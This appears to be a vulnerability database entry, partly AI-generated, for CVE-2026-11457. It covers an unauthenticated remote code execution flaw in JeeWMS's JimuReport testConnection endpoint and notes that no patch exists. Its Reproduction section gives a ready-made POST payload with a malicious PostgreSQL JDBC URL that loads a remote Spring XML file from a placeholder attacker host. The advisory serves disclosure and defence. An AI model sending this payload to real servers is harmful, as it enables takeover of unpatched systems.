CVE-2026-11457
Description
JEEWMS JimuReport test-connection endpoint allows unauthenticated RCE via JDBC connection parameter manipulation.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
JEEWMS JimuReport test-connection endpoint allows unauthenticated RCE via JDBC connection parameter manipulation.
Vulnerability
A security flaw exists in erzhongxmu JeeWMS up to commit 141740afb2ba14d441c82a833d0a418d07ca2d69 within the /base-boot/jmreport/testConnection endpoint. This endpoint is accessible without authentication due to Shiro configuration. The vulnerability lies in the direct use of provided JDBC connection parameters, including dbType, dbDriver, dbUrl, dbUsername, and dbPassword, to establish a database connection.
Exploitation
An unauthenticated remote attacker can exploit this vulnerability by sending a crafted POST request to the /base-boot/jmreport/testConnection endpoint with a JSON payload. The attacker must supply a malicious PostgreSQL JDBC URL containing parameters like socketFactory and socketFactoryArg. This allows the application to load a remote Spring XML resource, which can then be used to execute arbitrary commands on the server.
Impact
Successful exploitation of this vulnerability allows an unauthenticated attacker to achieve remote code execution (RCE) on the affected server. The attacker gains the ability to execute arbitrary commands with the privileges of the running application.
Mitigation
This product follows a rolling release approach, and specific version details for affected or updated releases are not provided. The vendor was contacted but did not respond. No patched version or workaround is currently disclosed in the available references. The vendor's website is https://www.huayi-tec.com/ and the software repository is https://gitee.com/erzhongxmu/JEEWMS [1].
AI Insight generated on Jun 7, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: up to 141740afb2ba14d441c82a833d0a418d07ca2d69
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The JimuReport test-connection endpoint accepts and uses attacker-controlled JDBC parameters to establish database connections, leading to arbitrary class instantiation and potential remote code execution."
Attack vector
An unauthenticated attacker can send a POST request to the /base-boot/jmreport/testConnection endpoint with a JSON payload. This payload includes JDBC connection parameters such as dbType, dbDriver, dbUrl, and dbPassword. By manipulating the dbUrl with specific PostgreSQL JDBC parameters like socketFactory and socketFactoryArg, the attacker can trigger a dangerous class-loading and object-instantiation path, potentially leading to remote code execution [ref_id=1].
Affected code
The vulnerability resides in the /base-boot/jmreport/testConnection endpoint within the JimuReport component. The Shiro configuration explicitly marks the /jmreport/** path as anonymous, allowing unauthenticated access to this endpoint [ref_id=1]. The endpoint directly utilizes provided parameters like dbType, dbDriver, and dbUrl to test database connections.
What the fix does
The advisory does not specify any patches or fixes. It notes that the vendor was contacted but did not respond. Therefore, no remediation guidance is available, and the vulnerability remains unaddressed by the vendor.
Preconditions
- authNo authentication is required to access the vulnerable endpoint [ref_id=1].
- inputThe attacker must be able to control the dbType, dbDriver, and dbUrl parameters sent in the request body [ref_id=1].
- networkThe attacker must have network access to the target server.
Reproduction
POST /base-boot/jmreport/testConnection HTTP/1.1 Host: <target> Content-Type: application/json
{ "dbType": "postgresql", "dbDriver": "org.postgresql.Driver", "dbUrl": "jdbc:postgresql://<attacker-host>:5432/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://<attacker-host>:8081/bean.xml" }
Generated on Jun 7, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5News mentions
0No linked articles in our index yet.